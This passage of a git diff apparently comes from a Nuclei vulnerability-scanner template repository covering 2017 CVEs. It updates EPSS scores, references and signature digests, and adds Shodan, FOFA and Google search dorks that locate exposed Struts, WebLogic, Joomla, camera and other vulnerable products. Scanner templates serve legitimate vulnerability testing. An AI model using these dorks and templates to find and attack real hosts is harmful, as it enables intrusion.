4b0a00483046022100d29fdd415b29112463f116a395e27d57520ac8863b59435c3ab3bd8c9de579b2022100b98beb232332f6eb2c320dcb65057b007073e7c8ea50fd433ac91e2a9e86355a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 4b4be69409..704a9d2e04 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -26,6 +26,11 @@ info: max-request: 1 vendor: oracle product: weblogic_server + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle http: @@ -58,4 +63,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a004730450221009af3dc7a023956f425c329f162e8bf603416c546b1876ce01e72ac09119bc24202205406c351433b267b3312803f8f1cd75b9707dfc851008977f33e4db88e70404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050af26b86c7352e010d4c1bb210c592ab517c353a3a278fee1e2a88f7884f639022100a897daf2889e7890582d81e9978861aa625d15e1e8966cca13e17fcd24e90d24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 34e1582b67..7725db6fc3 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.81972 + epss-percentile: 0.82307 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a00483046022100af3043267f661047f2abd255139659c6876cf783ed9a49639876eac74d86842f022100e4a34a3823612505eff0f06d3c4e61785f3cd30694b6d799da940a7b4bd501e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2e8be373cdfe4833f47e0738ec1a9f260610f9aaac5a8bcd4511f8ebd39ef7a022074324b0070bd1af8ec301343eee9810571eabec58ee24f22be7a44c8eb05436e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index a39445b71a..e08ffdb597 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49103 + epss-percentile: 0.49977 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100b96f472aaedfc274fdfdec8a3b816d78acbc2505300b1d40c565b457822a0cce0220437e462685b9f8c0bc91b355e244b8882fb26379f7d5f3c244f591b218cac549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092d78e5c2ee601a72fc1005ecee2f4d612d4e1e2ad952794c3c9b11b002f77cb0221008c9d309becc69658e90dcaaa56997b4ddc7bbd5f7964589f4253b715708a4b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 501f03a2c3..84d9a8d22f 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -15,13 +15,14 @@ info: - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.exploit-db.com/exploits/41205/ + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99914 + epss-percentile: 0.99921 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059065c5c9ba92a40e10293914467e7965bbb2954d0bb893d401c3154c1d6eb5d022100b85fa32ba119c6b5a80ed29385a4e05c8c072b17d9dd11e9812bd4a8974b0953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 8f0b35c820..665535b2a3 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65504 + epss-percentile: 0.68687 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kmc_information_systems product: caseaware + fofa-query: title="caseaware" tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems http: @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204bfed1bb3dad739a1ef9947e49b189c36f2e6b0b1d6f845ce934981c33f2633302202ba6d95bcd7b94e5cf7c6db6480c3a72fa840646907405d0f5cc57b7dfb6c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 4a75dec841..4b029a8de1 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -21,7 +21,7 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - epss-score: 0.97543 + epss-score: 0.97542 epss-percentile: 0.99995 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: @@ -29,7 +29,16 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Apache Struts" + shodan-query: + - html:"Apache Struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,kev,msf,struts,rce http: @@ -48,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b13a1627744af175b5ff3208123d7121d1993c1da5916daba690480cb512f923022100fbb3814519400f6165a557af4ce8f740fd1f47aead0436e981e555de1894a22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abf34bde000320ae4e9c1d41b55199b292cda0a25e76520dbbd0fb79fdc188c5022100b6cb3b2918088f18956ef2d5bef585397d1d187a42df64a8f428694357252bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 31c5b32685..9f0b20b28f 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -28,7 +28,11 @@ info: max-request: 2 vendor: intel product: active_management_technology_firmware - shodan-query: title:"Active Management Technology" + shodan-query: + - title:"Active Management Technology" + - http.title:"active management technology" + fofa-query: title="active management technology" + google-query: intitle:"active management technology" tags: cve2017,cve,amt,intel,tenable,kev http: @@ -54,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1ebf3bfcfaab0443bed7c0c3767867af141501aac600f4f387e61c7d0dab97c022060fd9aabe9ac1b63059fb46dfa7eb24a6b438f68a5ee9f4f028cb7e65532233c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae7d986daa94e8b737d413b411866526197e7ed9ee7c05b29e23a4639988c5b6022100bbfb016406072dfabfdae4b9a0d3db56a1d54283a4b723453bb6ca0a0e322224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index b4bdcfd7eb..f36b30eb81 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -13,21 +13,26 @@ info: - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - https://www.exploit-db.com/exploits/42934/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.97204 - epss-percentile: 0.99787 + epss-percentile: 0.99825 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: phpcollab product: phpcollab - shodan-query: http.title:"PhpCollab" + shodan-query: + - http.title:"PhpCollab" + - http.title:"phpcollab" + fofa-query: title="phpcollab" + google-query: intitle:"phpcollab" tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive - variables: string: "CVE-2017-6090" @@ -59,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220496ae546246d7f15d11e64df627664165cfcd3bb66143a4ae5ca128fd250d83e022100846622a1c08d291892cd39ad2e062cdaf36123efb0096ecdb6924824bb274096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3eccf8a8a7a6d8147aa5fd22a5cc4544f16063db9ba7f74116c6e413b6eddb7022100c8d71b9c1e63500b46e4c6c242fb2e5b9a3109b8d9c234c70c5f729ce7446138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 9514f14b50..578a6a829d 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve2017,cve,rce,windows,iis,kev,microsoft http: @@ -53,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022022020aa8a873fc818a13eee28f236f26cae0b0aa75204ada8c216d36f82b6d7c022027edcd8a1cc6e78bf98d96759d25094658fc6bce1a48f195a363cece01b7f99c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220495b1fa854301eccccabfffc0d5758e79ca9d470d6c9daeed43c960791f9e12d022068e5219d420072a580169f3a2124207ad3774a71cbd02d18543af151bc886452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index ed275c5a6d..5cef3d8885 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56428 + epss-percentile: 0.56964 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: magmi_project product: magmi + shodan-query: http.component:"magento" tags: cve2017,cve,magmi,xss,magmi_project http: @@ -49,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220255b4c36fbfca640300f406d76a18de517faa9583bb267338fc7a2d4b36ac070022100e236f6809fd321445907dbc37b9c4def04ad09fc52f798e4324fa84812fd5331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022032f11d9b1504fb042b6c91f441deb1a249e941dcbde63ac51f350b05b9e83f71022100875a24db627da0c59bd4743d91b6cca4c08dae7b6fa17d24f1a216284fd2b0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index dce109934a..6024c716e0 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -26,12 +26,16 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.99917 + epss-percentile: 0.99923 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: mantisbt product: mantisbt + shodan-query: + - http.favicon.hash:662709064 + - cpe:"cpe:2.3:a:mantisbt:mantisbt" + fofa-query: icon_hash=662709064 tags: cve,cve2017,mantisbt,unauth,edb http: @@ -55,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b9e716101bb9f2757f476a63cfce5c17b9dd089a0ba767e03f491ecace39fb6022045455d4187be15412d331dd2b561c4328cdde8acc3c42a3de9f9ceb407376d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041805e05c3c9b623e1cf11a4a911cf78525f1ef192d5e1e7f48e013de771aa2e022100c10781e737c1f71f4d7924d4392097b6b4eba984a0afb52f0595caf908e204b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 73a298378d..7ec10265b6 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -23,7 +23,11 @@ info: max-request: 1 vendor: icewarp product: server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"gotify" + fofa-query: title="gotify" + google-query: intitle:"gotify" tags: cve,cve2017,xss,icewarp http: @@ -49,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ecd748d0da7f1f3e5a44b0351d29bf699e21b0bcfd59e00013b81f7dde887d6f02204f738f06eb2c47e277ac21b6bf66fc965783038678586e2b9e397c57124bc240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b56c8f008cfed93fbc36ea1e427b0b09bed2075d53ba1c7897cd03da17fb324602203b314ea3d40bb63c65979c2cdde9eab07028c301021cf5c1d7e23239ca4f51c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index cc1ad0e3e8..8f03aa5507 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.85934 + epss-percentile: 0.86195 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,4 @@ http: part: header words: - "application/xml" -# digest: 4b0a00483046022100c915ea5b7a67b269e652cfe5189fbeef5beca1a6e3a09c0ee59298ed9bfbede3022100a8f03caa34047f0f2cd4751cf4c772529f216a56e3e91553f99c1a7eef9bd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202fc20ee39e85f5fe1fee30017bf018dd548bd28468bc79ff6924b19001a637dc022100f9a502ee528a29825061ad581ea1efce6ba69e6cb7f6b655966e2117fb40ded1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 4e91d62001..50fabcbed7 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -27,6 +27,7 @@ info: vendor: dahuasecurity product: dh-ipc-hdbw23a0rn-zs_firmware shodan-query: http.favicon.hash:2019488876 + fofa-query: icon_hash=2019488876 tags: cve,cve2017,dahua,camera,dahuasecurity http: @@ -47,4 +48,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb029caf367f8db0b6350bdbb7b05a9622f3697a1629618e6bd455078d7793ba022100d707398eb77439d4e9261fb482ffd40bd033da6cf31d4178e5e6549d3cc6d8e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index d2bb37a789..ae983d9f82 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -21,16 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8229 cwe-id: CWE-255 - epss-score: 0.89506 - epss-percentile: 0.98685 + epss-score: 0.93383 + epss-percentile: 0.99075 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: amcrest product: ipm-721s_firmware - shodan-query: html:"Amcrest" - fofa-query: "Amcrest" + shodan-query: + - html:"Amcrest" + - http.html:"amcrest" + fofa-query: + - "Amcrest" + - amcrest + - body="amcrest" tags: cve2017,cve,packetstorm,seclists,amcrest,iot http: @@ -55,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c000631a0c97636538dc8e4fbca4baf666978b4bba64636814f5435ea5c89dc502206c941fddb497b4594fee41ef719d28299f1198960ade04faf4ead19ac181b3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 036670e1de..b69502d556 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -22,14 +22,19 @@ info: cve-id: CVE-2017-8917 cwe-id: CWE-89 epss-score: 0.97555 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.component:"Joomla" + shodan-query: + - http.component:"Joomla" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" + fofa-query: body="joomla! - open source content management" tags: cve2017,cve,joomla,sqli variables: num: "999999999" @@ -44,4 +49,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 490a0046304402202a42607f81069bc80a480ecb156ace94e0e76862ee4d3c4f68a9b927f241d59402207c07437e69c7376ab7c771a7bb2fa469bcc225985cb16e57a19da92fe3f20241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a030884fea5b5b41a56e0efaca3477b0e5ee0c879e97b73a7bf3e967ec417100220260e50277cdd74a84133933a2063af90d82978303266b17cb0f061613ccfbb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index de79ed77ef..0f7bc4af52 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.55758 + epss-percentile: 0.56488 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0ae3cee6c032779188defaba13ba515900432974163523509b991be8eb3bbe6022044aaab25b4230a8a91fd5f434ae326ca2b94cde43bf07ffffb32b94a7125bb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 758a65dd40..5ec10a89fd 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.52791 + epss-percentile: 0.53673 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: raygun product: raygun4wp framework: wordpress tags: cve2017,cve,wordpress,xss,wp-plugin,raygun - flow: http(1) && http(2) http: @@ -65,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a5bb9d6ed82d7766d04e93226e4ab9aaacc265ab8feee1621e74ecd4b7fb76e022100aea36e48ce640598175ed79b106073b46b52ac7bacff32398f09dfbb02f8d5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dadcf9234046ee2489dc0606a075f94773767dc3372e81c6da133580af06991602203f9a76992f5703e2164107795c1686ae2772cf9270119b06b630b3f13c6833e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index f2bc24d415..813a174416 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -18,14 +18,19 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 - epss-score: 0.01037 - epss-percentile: 0.83585 + epss-score: 0.01187 + epss-percentile: 0.85048 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: odoo product: odoo + shodan-query: + - cpe:"cpe:2.3:a:odoo:odoo" + - http.title:"odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi http: @@ -51,4 +56,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c115e718d85457df3f04a77cdf612a8a6e44b1a73e97bf8cd5b7b8cb9c7a4f602201566150bfed49300f3c98e4c961c6f0ccb37ad3757ea3229129cbb69f63ae0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 69bed2f75e..f123fb2228 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -14,19 +14,22 @@ info: - https://ecosystem.atlassian.net/browse/OAUTH-344 - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - https://nvd.nist.gov/vuln/detail/CVE-2017-9506 + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75564 + epss-percentile: 0.77897 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: oauth - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2017,atlassian,jira,ssrf,oast http: @@ -41,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdd05fa5c0deeb6b649a252a6d564fd433b6deb4f8aa316ae60e10ee5f4c3d8c02207109e111af0babd6a2066b46a0cee7b17930e26f7c2e5233ae29d50e307be71d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index 488403b049..44d1fae355 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -29,8 +29,17 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: title:"Struts2 Showcase" - fofa-query: title="Struts2 Showcase" + shodan-query: + - title:"Struts2 Showcase" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - title="Struts2 Showcase" + - title="struts2 showcase" + - body="apache struts" + - body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,rce,struts,kev variables: num1: "{{rand_int(40000, 44800)}}" @@ -61,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d5e3820e512db011373ede9813749ce666b0b1030e3bafb75a433c8f747058d022100a71caf04a60f079184c23f7c442ca72d1e8642ac385157ab9944830e92448b58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008990d8265ba9047cd53cff01c7b1e0c645dd4075942379a74e7329fe0316b2c102207b613dfb9ed28eb6ff875229277dd982af169e6990252cad0d8515b85d4c2694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 8b453e5610..8e33f1882a 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -21,12 +21,21 @@ info: cve-id: CVE-2017-9805 cwe-id: CWE-502 epss-score: 0.97541 - epss-percentile: 0.99995 + epss-percentile: 0.99994 cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts,kev http: @@ -108,4 +117,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc5b27f8220ef07fafc0bfb8cb6b3da91db3cd7a60b59c5bc1c4a435b156d580022041740751cdbae48cd39a4854884b7229472bcc58b4eb972ba699f82a9bbd627d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 97e44144e5..58cae6aff8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -20,13 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 - epss-score: 0.97056 - epss-percentile: 0.99742 + epss-score: 0.96984 + epss-percentile: 0.99734 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware product: dotnetnuke + fofa-query: app="dotnetnuke" tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware http: @@ -50,4 +51,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009be35f84b58a3b2534536d4717801b75f2f9cec7a15b7a50ddab4fa986660d9e022100f6a7a8f7f29cd485e81d17ed1b9b3fb1ce3f3be143c79087b917bd4abd3c0a57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index fcdf436a30..2f6561f1b3 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -21,7 +21,7 @@ 